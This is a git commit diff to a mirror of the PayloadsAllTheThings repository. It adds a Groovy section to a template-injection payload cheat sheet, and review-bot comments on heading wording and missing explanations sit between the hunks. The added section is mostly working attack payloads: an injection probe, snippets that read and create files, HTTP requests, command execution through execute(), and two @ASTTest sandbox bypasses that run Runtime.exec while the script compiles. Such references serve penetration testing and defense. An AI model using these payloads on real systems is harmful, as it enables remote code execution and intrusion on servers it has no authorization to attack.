mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
added Groovy EL section
parent
521975a05c
commit
3db4d04467
@ -15,6 +15,12 @@
|
|||||||
* [Freemarker](#freemarker)
|
* [Freemarker](#freemarker)
|
||||||
* [Basic injection](#freemarker---basic-injection)
|
* [Basic injection](#freemarker---basic-injection)
|
||||||
* [Code execution](#freemarker---code-execution)
|
* [Code execution](#freemarker---code-execution)
|
||||||
|
* [Groovy](#groovy)
|
||||||
|
* [Basic injection](#groovy---basic-injection)
|
||||||
|
* [Read/Create file](#groovy---read-and-create-file)
|
||||||
|
* [HTTP Request](#groovy---http-request)
|
||||||
|
* [Command execution](#groovy---command-execution)
|
||||||
|
* [Sandbox bypass](#groovy---sandbox-bypass)
|
||||||
* [Handlebars](#handlebars)
|
* [Handlebars](#handlebars)
|
||||||
* [Jade / Codepen](#jade--codepen)
|
* [Jade / Codepen](#jade--codepen)
|
||||||
* [Java](#java)
|
* [Java](#java)
|
||||||
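Review bot: The new index labels do not match the section titles they link to: "Read/Create file" points at a heading written "Groovy - Read and create File", and "HTTP Request" points at "Groovy - HTTP request:". Pick one wording and capitalization and use it in both the index entry and the heading, as the existing Freemarker entries do.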
@ -184,6 +190,56 @@ ${dwf.newInstance(ec,null)("id")}
|
|||||||
|
|
||||||
---
|
---
|
||||||
|
|
||||||
|
## Groovy
|
||||||
|
|
||||||
|
[Official website](https://groovy-lang.org/)
|
||||||
|
|
||||||
|
|
||||||
|
### Groovy - Basic injection
|
||||||
|
|
||||||
|
Refer to https://groovy-lang.org/syntax.html , but `${9*9}` is the basic injection.
|
||||||
|
|
||||||
|
|
||||||
|
### Groovy - Read and create File
|
||||||
|
|
||||||
|
```groovy
|
||||||
|
String x = new File('c:/windows/notepad.exe').text
|
||||||
|
String x = new File('/path/to/file').getText('UTF-8')
|
||||||
|
new File("C:\Temp\FileName.txt").createNewFile();
|
||||||
|
```
|
||||||
|
|
||||||
|
### Groovy - HTTP request:
|
||||||
|
|
||||||
|
|
||||||
|
```groovy
|
||||||
|
"http://www.google.com".toURL().text
|
||||||
|
new URL("http://www.google.com").getText()
|
||||||
|
```
|
||||||
|
|
||||||
|
### Groovy - Command Execution
|
||||||
|
|
||||||
|
```groovy
|
||||||
|
"calc.exe".exec()
|
||||||
|
"calc.exe".execute()
|
||||||
|
this.evaluate("9*9") //(this is a Script)
|
||||||
|
new org.codehaus.groovy.runtime.MethodClosure("calc.exe","execute").call()
|
||||||
|
```
|
||||||
|
|
||||||
|
### Groovy - Sandbox Bypass
|
||||||
|
|
||||||
|
```groovy
|
||||||
|
@ASTTest(value={assert java.lang.Runtime.getRuntime().exec("whoami")})
|
||||||
|
def x
|
||||||
|
```
|
||||||
|
|
||||||
|
or
|
||||||
|
|
||||||
|
```groovy
|
||||||
|
new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x")
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
## Handlebars
|
## Handlebars
|
||||||
|
|
||||||
[Official website](https://handlebarsjs.com/)
|
[Official website](https://handlebarsjs.com/)
|
||||||
|
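Review bot: The "Groovy - Sandbox Bypass" section lists two snippets with no text saying which sandbox is meant or why they get past it. Add a sentence above the first block noting that the closure passed to `@ASTTest` is evaluated while the script is being compiled, not when it runs, so a reader can see why a restriction applied only at run time does not cover it and that the mitigation has to act at parse/compile time. The other subsections would benefit from a one-line description as well. Style: "### Groovy - HTTP request:" carries a trailing colon and different capitalization from the sibling headings, and is followed by two blank lines where the others have one.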